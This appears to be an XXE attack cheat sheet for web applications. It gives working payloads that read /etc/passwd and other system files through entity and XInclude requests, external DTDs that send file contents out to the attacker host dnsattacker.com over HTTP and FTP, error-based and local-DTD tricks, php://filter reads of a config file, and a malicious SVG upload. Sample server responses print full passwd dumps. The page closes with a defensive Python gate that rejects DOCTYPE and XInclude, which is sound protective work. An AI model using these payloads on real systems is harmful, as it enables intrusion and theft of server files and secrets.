Internal Entity XML Injection

What Are XML External Entity (XXE) Attacks

Return File in Response

ENTITY Error Request

Request:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<stockCheck><productId>&xxe;</productId><storeId>1</storeId></stockCheck>

Response:

HTTP/1.1 400 Bad Request
Content-Type: application/json
Connection: close
Content-Length: 1144

"Invalid product ID: root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
peter:x:2001:2001::/home/peter:/bin/bash
user:x:2000:2000::/home/user:/bin/bash
dnsmasq:x:101:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
messagebus:x:102:101::/nonexistent:/usr/sbin/nologin
"

XInclude Error Request

Request:

productId=<foo xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include parse="text" href="file:///etc/passwd"/></foo>&storeId=1

Response:

HTTP/1.1 400 Bad Request
Content-Type: application/json
Connection: close
Content-Length: 1144

"Invalid product ID: root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
peter:x:2001:2001::/home/peter:/bin/bash
user:x:2000:2000::/home/user:/bin/bash
dnsmasq:x:101:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
messagebus:x:102:101::/nonexistent:/usr/sbin/nologin
"

Reading the file through FTP

  • FTP is one of the better ways to read files out of band: some files contain characters that break the HTTP URL the contents are embedded in, and the FTP route avoids that problem.

XXE FTP Server - A {web,ftp}-server for XXE

Reading the file through HTTP

Using Entities

<?xml version="1.0" ?>
<!DOCTYPE data SYSTEM "http://dnsattacker.com:9000/linux.dtd">
<data>&send;</data>

linux.dtd

<!ENTITY % passwd SYSTEM "file:///etc/passwd">
<!ENTITY % wrapper "<!ENTITY send SYSTEM 'http://dnsattacker.com:9000/%passwd;'>">
%wrapper;
<!-- once %wrapper; has been expanded, the document's &send; resolves to: -->
<!-- <!ENTITY send SYSTEM "http://dnsattacker.com:9000/?CONTENTS_OF_PASSWD"> -->

Using Entities for all characters

<?xml version="1.0" ?>
<!DOCTYPE data SYSTEM "http://dnsattacker.com:9000/linux.dtd">
<data>&all;</data>

linux.dtd

<!ENTITY % file SYSTEM "file:///etc/fstab">
<!ENTITY % start "<![CDATA[">
<!ENTITY % end "]]>">
<!ENTITY % wrapper "<!ENTITY all '%start;%file;%end;'>">
%wrapper;

Using Entities Part 2

<?xml version="1.0" ?>
<!DOCTYPE r [
  <!ELEMENT r ANY >
  <!ENTITY % sp SYSTEM "http://dnsattacker.com:9000/linux.dtd">
  %sp;
  %param1;
]>
<r>&exfil;</r>

linux.dtd

<!ENTITY % data SYSTEM "file:///etc/passwd">
<!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://dnsattacker.com:9000/%data;'>">

linux_ftp.dtd

<!ENTITY % data SYSTEM "file:///etc/passwd">
<!ENTITY % param1 "<!ENTITY exfil SYSTEM 'ftp://dnsattacker.com:2121/%data;'>">

windows.dtd

<!ENTITY % data SYSTEM "file:///c:/windows/win.ini">
<!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://dnsattacker.com:9000/%data;'>">

Exfil File through Blind XXE

<?xml version="1.0" ?>
<!DOCTYPE message [
  <!ENTITY % local_dtd SYSTEM "file:///opt/IBM/WebSphere/AppServer/properties/sip-app_1_0.dtd">
  <!ENTITY % condition 'aaa)>
    <!ENTITY &#x25; file SYSTEM "file:///etc/passwd">
    <!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file://nonexistent/&#x25;file;&#x27;>">
    &#x25;eval;
    &#x25;error;
    <!ELEMENT aa (bb'>
  %local_dtd;
]>
<message>any text</message>

Exfil File through Error

<?xml version="1.0" ?>
<!DOCTYPE message [
  <!ENTITY % NUMBER '
    <!ENTITY &#x25; file SYSTEM "file:///etc/passwd">
    <!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file://nonexistent/&#x25;file;&#x27;>">
    &#x25;eval;
    &#x25;error;
  '>
  %NUMBER;
]>
<message>any text</message>

Blind XXE

Using a Malicious External DTD

Host this file on a Public Server:

<!ENTITY % file SYSTEM "file:///etc/hostname">
<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'https://ac611fac1e84e4e780370277011500c7.web-security-academy.net/?x=%file;'>">
%eval;
%exfil;

Make this request to the server:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ENTITY % xxe SYSTEM "https://ac611fac1e84e4e780370277011500c7.web-security-academy.net/exploit">
  %xxe;
]>
<stockCheck><productId>1</productId><storeId>1</storeId></stockCheck>

View the Logs:

172.31.30.228 2019-12-12 19:47:16 +0000 "GET /exploit HTTP/1.1" 200 "User-Agent: Java/11.0.1"
172.31.30.228 2019-12-12 19:47:16 +0000 "GET /?x=2c8bd21baa0e HTTP/1.1" 200 "User-Agent: Java/11.0.1"

Return File through Java Error

Host this file on a Public Server:

<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'file:///invalid/%file;'>">
%eval;
%exfil;

Make this request to the server:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE message [
  <!ENTITY % ext SYSTEM "https://ac921fe41e6d96b6805a1ff9013500a6.web-security-academy.net/exploit">
  %ext;
]>
<stockCheck><productId>1</productId><storeId>1</storeId></stockCheck>

Response:

HTTP/1.1 400 Bad Request
Content-Type: application/json
Connection: close
Content-Length: 1201

"XML parser exited with non-zero code 1: /invalid/root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
peter:x:2001:2001::/home/peter:/bin/bash
user:x:2000:2000::/home/user:/bin/bash
dnsmasq:x:101:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
messagebus:x:102:101::/nonexistent:/usr/sbin/nologin (No such file or directory)
"

Return File through Java Error with Local DTD


Request:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE message [
  <!ENTITY % local_dtd SYSTEM "file:///usr/share/yelp/dtd/docbookx.dtd">
  <!ENTITY % ISOamso '
    <!ENTITY &#x25; file SYSTEM "file:///etc/passwd">
    <!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///nonexistent/&#x25;file;&#x27;>">
    &#x25;eval;
    &#x25;error;
  '>
  %local_dtd;
]>
<stockCheck><productId>1</productId><storeId>1</storeId></stockCheck>

Response:

HTTP/1.1 400 Bad Request
Content-Type: application/json
Connection: close
Content-Length: 1205

"XML parser exited with non-zero code 1: /nonexistent/root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
peter:x:2001:2001::/home/peter:/bin/bash
user:x:2000:2000::/home/user:/bin/bash
dnsmasq:x:101:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
messagebus:x:102:101::/nonexistent:/usr/sbin/nologin (No such file or directory)
"

Reading the file through PHP Schema

Using the php:// stream wrapper (here with the base64-encode filter, so the file contents survive as a single text node even when they contain markup) to read files:

<?xml version="1.0"?>
<!DOCTYPE results [
  <!ENTITY harmless SYSTEM "php://filter/read=convert.base64-encode/resource=/var/www/config.ini">
]>
<results>
  <result>&harmless;</result>
</results>

Write Files

Using SVG

Upload an SVG file, then view the rendered image: the text element displays whatever the entity expanded to.

Example SVG:

<?xml version="1.0" standalone="yes"?>
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/hostname" > ]>
<svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">
  <text font-size="16" x="0" y="16">&xxe;</text>
</svg>
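Every request on this page, from the ENTITY and XInclude stock-check requests at the top through the local-DTD and php://filter variants to the SVG upload just above, depends on the parser accepting a DOCTYPE, an entity declaration or an XInclude element. The defensive check is therefore to refuse those constructs before any entity could be resolved. The Python gate below is an added example, not code from this page or from any tool it references; it uses only the standard library's expat bindings and ElementTree, and the sample documents (BENIGN_STOCK_CHECK, ENTITY_STOCK_CHECK, XINCLUDE_PRODUCT_ID, SVG_UPLOAD) are constructed for the example after the request bodies shown on this page.

```python
"""Added example: a pre-parse gate for untrusted XML, standard library only.

Stage 1 walks the bytes with expat and aborts on the first DOCTYPE or entity
declaration; expat reports these before it would resolve anything, and
parameter-entity parsing is switched off as a second line of defence.
Stage 2 parses the (now DTD-free) document and refuses any element in the
XInclude namespace, which expat itself ignores but an XInclude-aware library
further down the pipeline would act on.
"""
import xml.parsers.expat
import xml.etree.ElementTree as ET

XINCLUDE_NS = "http://www.w3.org/2001/XInclude"


class UnsafeXML(ValueError):
    """Raised when a document carries a DTD, an entity declaration or an XInclude element."""


def parse_untrusted_xml(data: bytes) -> ET.Element:
    """Return the parsed root element, or raise UnsafeXML / a parse error."""
    gate = xml.parsers.expat.ParserCreate()

    def on_doctype(name, sysid, pubid, has_internal_subset):
        raise UnsafeXML(f"DOCTYPE for <{name}> not allowed")

    def on_entity_decl(name, is_param, value, base, sysid, pubid, notation):
        raise UnsafeXML(f"entity declaration {name!r} not allowed")

    gate.StartDoctypeDeclHandler = on_doctype
    gate.EntityDeclHandler = on_entity_decl
    gate.SetParamEntityParsing(xml.parsers.expat.XML_PARAM_ENTITY_PARSING_NEVER)
    gate.Parse(data, True)  # an exception raised in a handler propagates out of Parse()

    root = ET.fromstring(data)
    for element in root.iter():
        if isinstance(element.tag, str) and element.tag.startswith("{" + XINCLUDE_NS + "}"):
            raise UnsafeXML("XInclude element not allowed")
    return root


def is_safe_xml(data: bytes) -> bool:
    """Boolean wrapper for the gate; malformed XML is treated as unsafe as well."""
    try:
        parse_untrusted_xml(data)
        return True
    except (UnsafeXML, xml.parsers.expat.ExpatError, ET.ParseError):
        return False


# Constructed samples, modelled on the request bodies shown on this page.
BENIGN_STOCK_CHECK = b"<stockCheck><productId>1</productId><storeId>1</storeId></stockCheck>"

ENTITY_STOCK_CHECK = (
    b'<?xml version="1.0" encoding="UTF-8"?>'
    b'<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>'
    b"<stockCheck><productId>&xxe;</productId><storeId>1</storeId></stockCheck>"
)

# The XML value that the XInclude request carries in its productId parameter.
XINCLUDE_PRODUCT_ID = (
    b'<foo xmlns:xi="http://www.w3.org/2001/XInclude">'
    b'<xi:include parse="text" href="file:///etc/passwd"/></foo>'
)

SVG_UPLOAD = (
    b'<?xml version="1.0" standalone="yes"?>'
    b'<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/hostname"> ]>'
    b'<svg xmlns="http://www.w3.org/2000/svg"><text>&xxe;</text></svg>'
)

if __name__ == "__main__":
    samples = [("benign", BENIGN_STOCK_CHECK), ("entity", ENTITY_STOCK_CHECK),
               ("xinclude", XINCLUDE_PRODUCT_ID), ("svg", SVG_UPLOAD)]
    for label, document in samples:
        print(f"{label:9s} safe={is_safe_xml(document)}")
```

Rejecting any DOCTYPE at all is deliberate: it also covers the local-DTD and php://filter payloads on this page, which all arrive inside a DOCTYPE, and it avoids having to enumerate dangerous URL schemes. Where the application's real parser handles XInclude or parameter entities natively, the same features must also be disabled in that parser's configuration, not only in a gate in front of it.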